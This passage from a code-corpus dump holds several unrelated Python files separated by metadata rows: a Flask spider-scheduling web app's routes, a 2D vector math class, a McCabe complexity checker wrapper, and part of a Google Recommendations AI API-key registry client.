"description": "@see http://apscheduler.readthedocs.io/en/latest/modules/triggers/cron.html",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "cron_hour",
"description": "",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "cron_day_of_month",
"description": "",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "cron_day_of_week",
"description": "",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "cron_month",
"description": "",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "enabled",
"description": "-1 / 0, default: 0",
"required": False,
"paramType": "form",
"dataType": 'int'
}, {
"name": "status",
"description": "if set to 'run' will run the job",
"required": False,
"paramType": "form",
"dataType": 'int'
}
])
def put(self, project_id, job_id):
post_data = request.form
if post_data:
job_instance = JobInstance.query.filter_by(project_id=project_id, id=job_id).first()
if not job_instance: abort(404)
job_instance.spider_arguments = post_data.get('spider_arguments') or job_instance.spider_arguments
job_instance.priority = post_data.get('priority') or job_instance.priority
job_instance.enabled = post_data.get('enabled', 0)
job_instance.cron_minutes = post_data.get('cron_minutes') or job_instance.cron_minutes
job_instance.cron_hour = post_data.get('cron_hour') or job_instance.cron_hour
job_instance.cron_day_of_month = post_data.get('cron_day_of_month') or job_instance.cron_day_of_month
job_instance.cron_day_of_week = post_data.get('cron_day_of_week') or job_instance.cron_day_of_week
job_instance.cron_month = post_data.get('cron_month') or job_instance.cron_month
job_instance.desc = post_data.get('desc', 0) or job_instance.desc
job_instance.tags = post_data.get('tags', 0) or job_instance.tags
db.session.commit()
if post_data.get('status') == 'run':
agent.start_spider(job_instance)
return True
class JobExecutionCtrl(flask_restful.Resource):
@swagger.operation(
summary='list job execution status',
parameters=[{
"name": "project_id",
"description": "project id",
"required": True,
"paramType": "path",
"dataType": 'int'
}])
def get(self, project_id):
return JobExecution.list_jobs(project_id)
class JobExecutionDetailCtrl(flask_restful.Resource):
@swagger.operation(
summary='stop job',
notes='',
parameters=[
{
"name": "project_id",
"description": "project id",
"required": True,
"paramType": "path",
"dataType": 'int'
},
{
"name": "job_exec_id",
"description": "job_execution_id",
"required": True,
"paramType": "path",
"dataType": 'string'
}
])
def put(self, project_id, job_exec_id):
job_execution = JobExecution.query.filter_by(project_id=project_id, id=job_exec_id).first()
if job_execution:
agent.cancel_spider(job_execution)
return True
api.add_resource(ProjectCtrl, "/api/projects")
api.add_resource(SpiderCtrl, "/api/projects/<project_id>/spiders")
api.add_resource(SpiderDetailCtrl, "/api/projects/<project_id>/spiders/<spider_id>")
api.add_resource(JobCtrl, "/api/projects/<project_id>/jobs")
api.add_resource(JobDetailCtrl, "/api/projects/<project_id>/jobs/<job_id>")
api.add_resource(JobExecutionCtrl, "/api/projects/<project_id>/jobexecs")
api.add_resource(JobExecutionDetailCtrl, "/api/projects/<project_id>/jobexecs/<job_exec_id>")
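# --- Illustrative REST usage sketch (added for clarity; not part of the
# original module). Host/port and IDs below are hypothetical:
#   import requests
#   base = 'http://localhost:5000'
#   requests.post(base + '/api/projects', data={'project_name': 'demo'})
#   requests.get(base + '/api/projects/1/spiders').json()
#   requests.put(base + '/api/projects/1/spiders/1',
#                data={'spider_arguments': 'arg1=v1', 'priority': 1})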
'''
========= Router =========
'''
@app.before_request
def intercept_no_project():
if request.path.find('/project//') > -1:
flash("create project first")
return redirect("/project/manage", code=302)
@app.context_processor
def inject_common():
return dict(now=datetime.datetime.now(),
servers=agent.servers)
@app.context_processor
def inject_project():
project_context = {}
project_context['project_list'] = Project.query.all()
if project_context['project_list'] and (not session.get('project_id')):
project = Project.query.first()
session['project_id'] = project.id
if session.get('project_id'):
project_context['project'] = Project.find_project_by_id(session['project_id'])
project_context['spider_list'] = [spider_instance.to_dict() for spider_instance in
SpiderInstance.query.filter_by(project_id=session['project_id']).all()]
else:
project_context['project'] = {}
return project_context
@app.context_processor
def utility_processor():
def timedelta(end_time, start_time):
        '''Return a human-readable time delta between two timestamps.
        :param end_time: datetime or '%Y-%m-%d %H:%M:%S' string
        :param start_time: datetime or '%Y-%m-%d %H:%M:%S' string
        :return: readable duration string (e.g. '5 m')
        '''
if not end_time or not start_time:
return ''
if type(end_time) == str:
end_time = datetime.datetime.strptime(end_time, '%Y-%m-%d %H:%M:%S')
if type(start_time) == str:
start_time = datetime.datetime.strptime(start_time, '%Y-%m-%d %H:%M:%S')
total_seconds = (end_time - start_time).total_seconds()
return readable_time(total_seconds)
def readable_time(total_seconds):
if not total_seconds:
return '-'
if total_seconds < 60:
return '%s s' % total_seconds
if total_seconds < 3600:
return '%s m' % int(total_seconds / 60)
return '%s h %s m' % (int(total_seconds / 3600), int((total_seconds % 3600) / 60))
return dict(timedelta=timedelta, readable_time=readable_time)
@app.route("/")
def index():
project = Project.query.first()
if project:
return redirect("/project/%s/job/dashboard" % project.id, code=302)
return redirect("/project/manage", code=302)
@app.route("/project/<project_id>")
def project_index(project_id):
session['project_id'] = project_id
return redirect("/project/%s/job/dashboard" % project_id, code=302)
@app.route("/project/create", methods=['post'])
def project_create():
project_name = request.form['project_name']
project = Project()
project.project_name = project_name
db.session.add(project)
db.session.commit()
return redirect("/project/%s/spider/deploy" % project.id, code=302)
@app.route("/project/<project_id>/delete")
def project_delete(project_id):
project = Project.find_project_by_id(project_id)
agent.delete_project(project)
db.session.delete(project)
db.session.commit()
return redirect("/project/manage", code=302)
@app.route("/project/manage")
def project_manage():
return render_template("project_manage.html")
@app.route("/project/<project_id>/job/dashboard")
def job_dashboard(project_id):
return render_template("job_dashboard.html", job_status=JobExecution.list_jobs(project_id))
@app.route("/project/<project_id>/job/periodic")
def job_periodic(project_id):
project = Project.find_project_by_id(project_id)
job_instance_list = [job_instance.to_dict() for job_instance in
JobInstance.query.filter_by(run_type="periodic", project_id=project_id).all()]
return render_template("job_periodic.html",
job_instance_list=job_instance_list)
@app.route("/project/<project_id>/job/add", methods=['post'])
def job_add(project_id):
project = Project.find_project_by_id(project_id)
job_instance = JobInstance()
job_instance.spider_name = request.form['spider_name']
job_instance.project_id = project_id
job_instance.spider_arguments = request.form['spider_arguments']
job_instance.priority = request.form.get('priority', 0)
job_instance.run_type = request.form['run_type']
    # choose daemon manually
if request.form['daemon'] != 'auto':
spider_args = []
if request.form['spider_arguments']:
spider_args = request.form['spider_arguments'].split(",")
spider_args.append("daemon={}".format(request.form['daemon']))
job_instance.spider_arguments = ','.join(spider_args)
if job_instance.run_type == JobRunType.ONETIME:
job_instance.enabled = -1
db.session.add(job_instance)
db.session.commit()
agent.start_spider(job_instance)
if job_instance.run_type == JobRunType.PERIODIC:
job_instance.cron_minutes = request.form.get('cron_minutes') or '0'
job_instance.cron_hour = request.form.get('cron_hour') or '*'
job_instance.cron_day_of_month = request.form.get('cron_day_of_month') or '*'
job_instance.cron_day_of_week = request.form.get('cron_day_of_week') or '*'
job_instance.cron_month = request.form.get('cron_month') or '*'
# set cron exp manually
if request.form.get('cron_exp'):
job_instance.cron_minutes, job_instance.cron_hour, job_instance.cron_day_of_month, job_instance.cron_day_of_week, job_instance.cron_month = \
request.form['cron_exp'].split(' ')
db.session.add(job_instance)
db.session.commit()
return redirect(request.referrer, code=302)
@app.route("/project/<project_id>/jobexecs/<job_exec_id>/stop")
def job_stop(project_id, job_exec_id):
job_execution = JobExecution.query.filter_by(project_id=project_id, id=job_exec_id).first()
agent.cancel_spider(job_execution)
return redirect(request.referrer, code=302)
@app.route("/project/<project_id>/jobexecs/<job_exec_id>/log")
def job_log(project_id, job_exec_id):
job_execution = JobExecution.query.filter_by(project_id=project_id, id=job_exec_id).first()
res = requests.get(agent.log_url(job_execution))
res.encoding = 'utf8'
raw = res.text
return render_template("job_log.html", log_lines=raw.split('\n'))
@app.route("/project/<project_id>/job/<job_instance_id>/run")
def job_run(project_id, job_instance_id):
job_instance = JobInstance.query.filter_by(project_id=project_id, id=job_instance_id).first()
agent.start_spider(job_instance)
return redirect(request.referrer, code=302)
@app.route("/project/<project_id>/job/<job_instance_id>/remove")
def job_remove(project_id, job_instance_id):
job_instance = JobInstance.query.filter_by(project_id=project_id, id=job_instance_id).first()
db.session.delete(job_instance)
db.session.commit()
return redirect(request.referrer, code=302)
@app.route("/project/<project_id>/job/<job_instance_id>/switch")
def job_switch(project_id, job_instance_id):
job_instance = JobInstance.query.filter_by(project_id=project_id, id=job_instance_id).first()
job_instance.enabled = -1 if job_instance.enabled == 0 else 0
db.session.commit()
return redirect(request.referrer, code=302)
@app.route("/project/<project_id>/spider/dashboard")
def spider_dashboard(project_id):
spider_instance_list = SpiderInstance.list_spiders(project_id)
return render_template("spider_dashboard.html",
spider_instance_list=spider_instance_list)
@app.route("/project/<project_id>/spider/deploy")
def spider_deploy(project_id):
project = Project.find_project_by_id(project_id)
return render_template("spider_deploy.html")
@app.route("/project/<project_id>/spider/upload", methods=['post'])
def spider_egg_upload(project_id):
project = Project.find_project_by_id(project_id)
if 'file' not in request.files:
flash('No file part')
return redirect(request.referrer)
file = request.files['file']
    # if user does not select a file, the browser also
    # submits an empty part without filename
if file.filename == '':
flash('No selected file')
return redirect(request.referrer)
if file:
filename = secure_filename(file.filename)
dst = os.path.join(tempfile.gettempdir(), filename)
file.save(dst)
agent.deploy(project, dst)
flash('deploy success!')
return redirect(request.referrer)
@app.route("/project/<project_id>/project/stats")
def project_stats(project_id):
project = Project.find_project_by_id(project_id)
run_stats = JobExecution.list_run_stats_by_hours(project_id)
return render_template("project_stats.html", run_stats=run_stats)
@app.route("/project/<project_id>/server/stats")
def service_stats(project_id):
project = Project.find_project_by_id(project_id)
run_stats = JobExecution.list_run_stats_by_hours(project_id)
return render_template("server_stats.html", run_stats=run_stats)
| mit | -8,691,276,491,781,630,000 | 34.824324 | 153 | 0.568171 | false | 3.770982 | false | false | false |
FCDM/py-dml | dml/maths/geometry.py | 1 | 3226 | import math
class Vector2D(object):
"""
A vector in 2-dimensional space.
"""
def __init__(self, x, y=None):
if y is None:
x, y = x
self.x = x
self.y = y
@classmethod
def fromAngle(cls, angle, radians=True):
"""Return the unit vector in the given direction."""
if not radians:
angle = math.radians(angle)
return cls(math.cos(angle), math.sin(angle))
def __repr__(self):
return "Vector2D(%g, %g)" % (self.x, self.y)
def __hash__(self):
return hash((self.x, self.y))
def __getitem__(self, key):
if key == 0:
return self.x
return self.y
def __iter__(self):
return iter((self.x, self.y))
def __pos__(self):
return Vector2D(self.x, self.y)
def __neg__(self):
return Vector2D(-self.x, -self.y)
def __add__(self, other):
return Vector2D(self.x + other.x, self.y + other.y)
__radd__ = __add__
def __sub__(self, other):
return Vector2D(self.x - other.x, self.y - other.y)
def __rsub__(self, other):
return Vector2D(other.x - self.x, other.y - self.y)
def __mul__(self, other):
return Vector2D(self.x*other, self.y*other)
__rmul__ = __mul__
def __div__(self, other):
return Vector2D(self.x/other, self.y/other)
__truediv__ = __div__
def floor(self):
"""Floor the components of this vector."""
return Vector2D(int(self.x), int(self.y))
def magnitude(self):
"""Calculate the magnitude of this vector."""
return math.sqrt(self.x*self.x + self.y*self.y)
def magnitudeSquared(self):
"""Calculate the squared magnitude of this vector."""
return self.dot(self)
def dot(self, other):
"""Calculate the dot product of this vector and another."""
return self.x*other.x + self.y*other.y
def normalize(self):
"""Return the normalization of this vector."""
return self/self.magnitude()
def lnormal(self):
"""Return the left normal of this vector."""
return Vector2D(self.y, -self.x)
def rnormal(self):
"""Return the right normal of this vector."""
        return Vector2D(-self.y, self.x)
def projectOnto(self, other):
"""Return the projection of this vector onto another."""
scalar = self.dot(other)/other.magnitudeSquared()
return other*scalar
def rotateRelative(self, angle, origin, radians=True):
"""Rotate this vector relative to another by the given amount."""
if not radians:
angle = math.radians(angle)
x, y = self
x -= origin.x
y -= origin.y
cos_theta = math.cos(angle)
sin_theta = math.sin(angle)
nx = x*cos_theta - y*sin_theta
ny = x*sin_theta + y*cos_theta
return Vector2D(nx + origin.x, ny + origin.y)
def rotate(self, angle, radians=True):
"""Rotate this vector by the given amount."""
if not radians:
angle = math.radians(angle)
x, y = self
cos_theta = math.cos(angle)
sin_theta = math.sin(angle)
return Vector2D(x*cos_theta - y*sin_theta, x*sin_theta + y*cos_theta)
def lerp(self, other, amount):
"""Linearly interpolate between this vector and another."""
return self + amount*(other - self)
def angle(self, radians=True):
"""
Return the angle at which this vector points relative to the
positive x-axis.
"""
angle = math.atan2(self.y, self.x)
if not radians:
angle = math.degrees(angle)
return angle
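# --- Illustrative usage sketch (added for clarity; not part of the original
# module):
#   v = Vector2D(3, 4)
#   v.magnitude()                    # 5.0
#   (v + Vector2D(1, 0)).dot(v)      # 28
#   Vector2D.fromAngle(math.pi / 2)  # approx Vector2D(0, 1)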
Vector2D.origin = Vector2D(0, 0)
| mit | 1,201,121,418,191,547,100 | 22.215827 | 71 | 0.652511 | false | 2.882931 | false | false | false
danny200309/anaconda | anaconda_lib/linting/anaconda_mccabe.py | 9 | 1577 | # -*- coding: utf8 -*-
# Copyright (C) 2013 - Oscar Campos <oscar.campos@member.fsf.org>
# This program is Free Software see LICENSE file for details
"""
Anaconda McCabe
"""
import ast
from .mccabe import McCabeChecker
class AnacondaMcCabe(object):
"""Wrapper object around McCabe python script
"""
checker = McCabeChecker
def __init__(self, code, filename):
self.code = code
self.filename = filename
@property
def tree(self):
"""Compile and send back an AST if buffer is able to be parsed
"""
try:
code = self.code.encode('utf8') + b'\n'
return compile(code, self.filename, 'exec', ast.PyCF_ONLY_AST)
except SyntaxError:
return None
def get_code_complexity(self, threshold=7):
"""Get the code complexity for the current buffer and return it
"""
if self.tree is not None:
self.checker.max_complexity = threshold
return self.parse(self.checker(self.tree, self.filename).run())
return None
def parse(self, complexities):
"""
Parse the given list of complexities to something that anaconda
understand and is able to handle
"""
errors = []
for complexity in complexities:
errors.append({
'line': int(complexity[0]),
'offset': int(complexity[1] + 1),
'code': complexity[2].split(' ', 1)[0],
'message': complexity[2].split(' ', 1)[1]
})
return errors
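# --- Illustrative usage sketch (added for clarity; not part of the original
# module; the relative import above means this runs inside the
# anaconda_lib.linting package):
#   checker = AnacondaMcCabe("def f(x):\n    return x\n", '<buffer>')
#   issues = checker.get_code_complexity(threshold=7)  # list of dicts, or None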
| gpl-3.0 | 8,689,864,748,901,092,000 | 24.852459 | 75 | 0.574509 | false | 4.022959 | false | false | false |
googleapis/python-recommendations-ai | google/cloud/recommendationengine_v1beta1/services/prediction_api_key_registry/client.py | 1 | 28310 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.recommendationengine_v1beta1.services.prediction_api_key_registry import (
pagers,
)
from google.cloud.recommendationengine_v1beta1.types import (
prediction_apikey_registry_service,
)
from .transports.base import PredictionApiKeyRegistryTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import PredictionApiKeyRegistryGrpcTransport
from .transports.grpc_asyncio import PredictionApiKeyRegistryGrpcAsyncIOTransport
class PredictionApiKeyRegistryClientMeta(type):
"""Metaclass for the PredictionApiKeyRegistry client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[PredictionApiKeyRegistryTransport]]
_transport_registry["grpc"] = PredictionApiKeyRegistryGrpcTransport
_transport_registry["grpc_asyncio"] = PredictionApiKeyRegistryGrpcAsyncIOTransport
def get_transport_class(
cls, label: str = None,
) -> Type[PredictionApiKeyRegistryTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class PredictionApiKeyRegistryClient(metaclass=PredictionApiKeyRegistryClientMeta):
"""Service for registering API keys for use with the ``predict``
method. If you use an API key to request predictions, you must first
register the API key. Otherwise, your prediction request is
rejected. If you use OAuth to authenticate your ``predict`` method
call, you do not need to register an API key. You can register up to
20 API keys per project.
"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "recommendationengine.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
PredictionApiKeyRegistryClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
PredictionApiKeyRegistryClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> PredictionApiKeyRegistryTransport:
"""Returns the transport used by the client instance.
Returns:
PredictionApiKeyRegistryTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def event_store_path(
project: str, location: str, catalog: str, event_store: str,
) -> str:
"""Returns a fully-qualified event_store string."""
return "projects/{project}/locations/{location}/catalogs/{catalog}/eventStores/{event_store}".format(
project=project,
location=location,
catalog=catalog,
event_store=event_store,
)
@staticmethod
def parse_event_store_path(path: str) -> Dict[str, str]:
"""Parses a event_store path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/catalogs/(?P<catalog>.+?)/eventStores/(?P<event_store>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def prediction_api_key_registration_path(
project: str,
location: str,
catalog: str,
event_store: str,
prediction_api_key_registration: str,
) -> str:
"""Returns a fully-qualified prediction_api_key_registration string."""
return "projects/{project}/locations/{location}/catalogs/{catalog}/eventStores/{event_store}/predictionApiKeyRegistrations/{prediction_api_key_registration}".format(
project=project,
location=location,
catalog=catalog,
event_store=event_store,
prediction_api_key_registration=prediction_api_key_registration,
)
@staticmethod
def parse_prediction_api_key_registration_path(path: str) -> Dict[str, str]:
"""Parses a prediction_api_key_registration path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/catalogs/(?P<catalog>.+?)/eventStores/(?P<event_store>.+?)/predictionApiKeyRegistrations/(?P<prediction_api_key_registration>.+?)$",
path,
)
return m.groupdict() if m else {}
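    # --- Illustrative path-helper usage (added for clarity; not part of the
    # generated client). IDs below are hypothetical:
    #   PredictionApiKeyRegistryClient.event_store_path(
    #       'my-project', 'global', 'my-catalog', 'default_event_store')
    #   => 'projects/my-project/locations/global/catalogs/my-catalog/eventStores/default_event_store'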
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, PredictionApiKeyRegistryTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the prediction api key registry client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, PredictionApiKeyRegistryTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(
util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false"))
)
client_cert_source_func = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
is_mtls = True
client_cert_source_func = client_options.client_cert_source
else:
is_mtls = mtls.has_default_client_cert_source()
if is_mtls:
client_cert_source_func = mtls.default_client_cert_source()
else:
client_cert_source_func = None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
if is_mtls:
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = self.DEFAULT_ENDPOINT
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted "
"values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, PredictionApiKeyRegistryTransport):
# transport is a PredictionApiKeyRegistryTransport instance.
if credentials or client_options.credentials_file:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
)
def create_prediction_api_key_registration(
self,
request: prediction_apikey_registry_service.CreatePredictionApiKeyRegistrationRequest = None,
*,
parent: str = None,
prediction_api_key_registration: prediction_apikey_registry_service.PredictionApiKeyRegistration = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> prediction_apikey_registry_service.PredictionApiKeyRegistration:
r"""Register an API key for use with predict method.
Args:
request (google.cloud.recommendationengine_v1beta1.types.CreatePredictionApiKeyRegistrationRequest):
The request object. Request message for the
`CreatePredictionApiKeyRegistration` method.
parent (str):
Required. The parent resource path.
``projects/*/locations/global/catalogs/default_catalog/eventStores/default_event_store``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
prediction_api_key_registration (google.cloud.recommendationengine_v1beta1.types.PredictionApiKeyRegistration):
Required. The prediction API key
registration.
This corresponds to the ``prediction_api_key_registration`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.recommendationengine_v1beta1.types.PredictionApiKeyRegistration:
Registered Api Key.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, prediction_api_key_registration])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a prediction_apikey_registry_service.CreatePredictionApiKeyRegistrationRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request,
prediction_apikey_registry_service.CreatePredictionApiKeyRegistrationRequest,
):
request = prediction_apikey_registry_service.CreatePredictionApiKeyRegistrationRequest(
request
)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if prediction_api_key_registration is not None:
request.prediction_api_key_registration = (
prediction_api_key_registration
)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.create_prediction_api_key_registration
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def list_prediction_api_key_registrations(
self,
request: prediction_apikey_registry_service.ListPredictionApiKeyRegistrationsRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListPredictionApiKeyRegistrationsPager:
r"""List the registered apiKeys for use with predict
method.
Args:
request (google.cloud.recommendationengine_v1beta1.types.ListPredictionApiKeyRegistrationsRequest):
The request object. Request message for the
`ListPredictionApiKeyRegistrations`.
parent (str):
Required. The parent placement resource name such as
``projects/1234/locations/global/catalogs/default_catalog/eventStores/default_event_store``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.recommendationengine_v1beta1.services.prediction_api_key_registry.pagers.ListPredictionApiKeyRegistrationsPager:
Response message for the
ListPredictionApiKeyRegistrations.
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a prediction_apikey_registry_service.ListPredictionApiKeyRegistrationsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request,
prediction_apikey_registry_service.ListPredictionApiKeyRegistrationsRequest,
):
